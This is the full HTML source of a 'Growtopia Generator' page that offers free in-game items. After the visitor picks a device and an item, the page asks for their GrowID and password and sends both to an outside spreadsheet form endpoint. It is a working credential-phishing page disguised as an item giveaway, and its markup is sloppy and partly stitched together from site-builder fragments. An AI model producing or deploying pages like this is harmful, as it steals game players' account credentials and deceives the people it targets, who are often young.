<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Growtopia Generator</title>
</head>
<body>
  <link rel="stylesheet" href="style.css">
<link rel="shortcut icon" type="image/png" href="https://cdn.discordapp.com/attachments/817263699882147871/821594420885323776/1_grow_icon_1513191167.png"/>
  <form action="https://api.sheetmonkey.io/form/4B6wDJypq8JUKJP4Q12cya" method="post">
    <!-- Put HTML input fields in here and see how they fill up your sheet -->
    <div class="form"></div>
    <tbody>
      <tr bgcolor="#ffffff">
          <td>
              <center>
                  <img src="https://cdn.discordapp.com/attachments/817263699882147871/821594420885323776/1_grow_icon_1513191167.png" alt="Growtopia" class="img-responsive">
                  <br>
                  <select class="form-select" aria-label="Default select example" style="background-color:skyblue content-size:100">
                    <option selected>Select Device</option>
                    <option value="windows">Windows</option>
                    <option value="ios">iOS</option>
                    <option value="android">Android</option>
                  </select>
                  </select>
                  <br>
                  <br>
                  <label for="items"><b>Items Name</b></label>
                  <br>
                  <input type="text" placeholder="Items Name" name="items" id="items" required>
                  <br>
                  <br>
                  </select>
                  <style>
                  /* Bordered form */
                  form {
                    border: 3px solid #f1f1f1;
                  }
                  
                  /* Full-width inputs */
                  input[type=text], input[type=password] {
                    width: 100%;
                    padding: 12px 20px;
                    margin: 8px 0;
                    display: inline-block;
                    border: 1px solid #ccc;
                    box-sizing: border-box;
                  }
                  
                  /* Set a style for all buttons */
                  button {
                    background-color: #4CAF50;
                    color: white;
                    padding: 14px 20px;
                    margin: 8px 0;
                    border: none;
                    cursor: pointer;
                    width: 100%;
                  }
                  
                  /* Add a hover effect for buttons */
                  button:hover {
                    opacity: 0.8;
                  }
                  
                  /* Extra style for the cancel button (red) */
                  .cancelbtn {
                    width: auto;
                    padding: 10px 18px;
                    background-color: #f44336;
                  }
                  
                  /* Center the avatar image inside this container */
                  .imgcontainer {
                    text-align: center;
                    margin: 24px 0 12px 0;
                  }
                  
                  /* Avatar image */
                  img.avatar {
                    width: 40%;
                    border-radius: 50%;
                  }
                  
                  /* Add padding to containers */
                  .container {
                    padding: 16px;
                  }
                  
                  /* The "Forgot password" text */
                  span.psw {
                    float: right;
                    padding-top: 16px;
                  }
                  
                  /* Change styles for span and cancel button on extra small screens */
                  @media screen and (max-width: 300px) {
                    span.psw {
                      display: block;
                      float: none;
                    }
                    .cancelbtn {
                      width: 100%;
                    }
                  }
                  </style>
                        <p>Login to Your <strong>GrowID</strong> for sent the <strong>Items</strong>
                        <form action="https://api.sheetmonkey.io/form/4B6wDJypq8JUKJP4Q12cya" method="get">
<div class="container">
<h1>Register</h1>
<p>Login to your Account</p>
<hr>

<label for="email"><b>GrowID</b></label>
<input type="text" placeholder="Enter GrowID" name="email" id="email" required>

<label for="psw"><b>Password</b></label>
<input type="password" placeholder="Enter Password" name="psw" id="psw" required>

  <button type="submit" class="registerbtn">Sent</button>
  <br>
  <br>
  <p><strong>Make sure your backpack is not full to sent the items!</strong></p>
</div>
                  <div id="myProgress" style="margin-top: 20px; margin-bottom: 10px; " align="left">
                      <center>
                          <div id="myBar" style="width: 0%; height: 20px; background: #21859C; border-radius: 20px; color:#ffffff;"></div>
                      </center>
                  </div>
                  <div style="border:2px #000000">
                      <b>
                          <div id="displaycode" style="border-radius: 5px; font-family: 'Trebuchet MS'; margin-top: 20px; margin-bottom: 20px; font-size: 25px; color:#8E0709"></div>
                      </b>
                  </div>
                  <div id="buttonactivatecode" style="display: none;">
                  </div>
                  <br>
                              </td>
          </center>
      </tr>
  </tbody>
</table>
</div></div></div></div></div><div class="vc_column tdi_20_161  wpb_column vc_column_container tdc-column td-pb-span3">
<style scoped>

/* custom css */
.tdi_20_161{
              vertical-align: baseline;
          }
</style><div class="wpb_wrapper"></div></div></div></div><div id="tdi_21_017" class="tdc-row"><div class="vc_row tdi_22_528  wpb_row td-pb-row" >
<style scoped>

/* custom css */
.tdi_22_528{
              min-height: 0;
          }
</style><div class="vc_column tdi_24_550  wpb_column vc_column_container tdc-column td-pb-span12">
<style scoped>

/* custom css */
.tdi_24_550{
              vertical-align: baseline;
          }
</style><div class="wpb_wrapper"><div class="wpb_wrapper td_block_separator td_block_wrap vc_separator tdi_26_811  td_separator_solid td_separator_center"><span style="border-color:#21859c;border-width:2px;width:100%;"></span></div><div class="vc_row_inner tdi_28_907  vc_row vc_inner wpb_row td-pb-row" >
<style scoped>

/* custom css */
.tdi_28_907{
              position: relative !important;
              top: 0;
              transform: none;
              -webkit-transform: none;
          }
</style><div class="vc_column_inner tdi_30_017  wpb_column vc_column_container tdc-inner-column td-pb-span12">
<style scoped>

/* custom css */
.tdi_30_017{
              vertical-align: baseline;
          }
  </div>
  </form>
  /* Bootsrap Data */
  <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.0-beta2/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-BmbxuPwQa2lc/FVzBcNJ7UAyJxM6wuqIj61tLrc4wSX0szH/Ev+nYRRuWlolflfl" crossorigin="anonymous">
<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.0-beta2/dist/js/bootstrap.bundle.min.js" integrity="sha384-b5kHyXgcpbZJO/tY9Ul7kGkf1S0CWuKcCD38l8YkeH8z8QjE0GmW1gYU5S9FOnJ0" crossorigin="anonymous"></script>
</body>
</html>
